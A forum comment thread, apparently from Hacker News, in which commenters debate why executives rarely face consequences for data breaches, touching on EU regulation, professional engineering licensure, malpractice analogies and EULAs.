Comment by ryandrake
1 day ago
Likely no consequences to the decision-makers for data exfiltration or other shenanigans happening, so there's nothing motivating a behavior change.
The reason security is so bad everywhere is that nobody gets fired when there's a breach. It's just blamed on the hackers and everyone just goes on with life singing "We take security very seriously--this happened because of someone else!"
Who do you imagine will get fired? The CISO who's been recommending various security imporvements and been trying to get them implemented, but been unable to do so due to a lack of C level interest in IT. Or the C level's who lack interest in IT security until it bites them in the investor?
At least here in the EU we're moving toward personal responsibility for C level's who don't take IT and OT security serious in critical sectors, but in my anecdotal experience that is the first time anything regarding security has actually made decision makers take it serious. A lot of it is still just bureaucracy though. We have a DORA and NIS2 compliant piece of OT that is technically completely insecure but is compliant because we've written a detailed plan on how to make it secure.
Who currently gets fired due to engineering malpractice? It would be the same thing if there was actual certifications and engineering sign-offs in cybersecurity or other critical areas of development.
I wont pretend that accountability in the physical engineering world is all smiles and rainbows but at least there are actual laws dictating responsibilities, certification and other real consequences for civil engineers. When a Professional Engineer in Canada signs-off (seal) on work they are legally assuming responsibility which means the practitioner could be held accountable in the event of professional misconduct or incompetence regarding the engineering work. There is no reason but corporate greed and corruption why there isn't similar legislation in North America for cybersecurity or software engineering where you have professional bodies certify people to be legally obligated to sign-off on work (and refuse work that isn't up to standards).
But this would require introducing actual legislation which god-forbid how could we do such a thing to the poor market! It would stifle their innovation at leaking everyone's data.
There's no reason we couldn't extend the same existing system of licensure [1] that professional engineers require.
Sure maybe its overkill for someone stringing together a python app, but if you're engineering the handling of any actual personal information then this work ought to be overseen by qualified, licensed and accountable professionals who are backed by actual laws.
[1]https://en.wikipedia.org/w/index.php?title=Regulation_and_li...
> nobody gets fired when there's a breach
this must mean the consequences of such a breach has either not produced any visible damage, or the entity being damaged is uncaring (or have no power to care).
If you fire people for stuff they didn’t maliciously introduced you will end up with no people to work with.
Imagine jailing doctors for every patient that died you would be out of doctors quite soon.
The legal system already has sufficient cop-out: for anything that you should have been aware of, or would have been informed about.
Eg. doctors do get sued and fired for malpractice, if they did something no other skilled doctor would reasonably do ("let's just use the instruments from the previous surgery").
1 reply →
If the doctor is criminally negligent they could be jailed.
4 replies →
We don't get delivered to us 18-year-olds that happen to be in perfect health. And a lot of Americans don't believe in wellness visits. Although more and more it's the insurance companies that are practicing medicine. Sorry it's a sore subject with me lol
>this must mean the consequences of such a breach has either not produced any visible damage
Yeah lets say you were carrying unencrypted frames for Bills Burger Hut.
The largest extent of the damage might be sniffing some smtp credentials or something. Bill sends some spam messages, never figures out how it was done but their IP reputation is always in the toilet.
Lets then say instead of Bills Burger Hut, you are carrying traffic for critical mineral and food industries. The attacker isnt a scammer, but a hostile nation state. Customer never realises, but theres a large, long term financial cost because (TOTALLY NOT CHINA) is sharing this data with competitors of yours overseas, or preparing to drop your pants in a huge way for foreign policy reasons.
No one gets fired until after the worst case long term damage, and even then probably not.
In fact, the likely outcome is that the burden gets moved to the customer for L2 encryption and the cowboy never changes.
End user license agreements are a huge part of the problem. Ideally users could sue if our data is leaked - and the threat of being sued would put pressure on companies to take security more seriously. Ie, it would become a business concern.
Instead we're constantly asked to sign one-sided contracts ("EULAs") which forbid us from suing. If a company's incompetence results in my data being leaked on the internet, there's no consequences. And not a thing any of us can do about it.
There is in at least California, the EU, and China. A lot of clauses in EULAs aren't actually legal.
1 reply →
Or, the entity being damaged is not the decision maker and has no power to hold the decision maker responsible.
Or the damage is diffuse whereas the costs of preventing the breach would be concentrated. Or the connection between the damage and the breach is difficult to prove.
That and h1b abuse.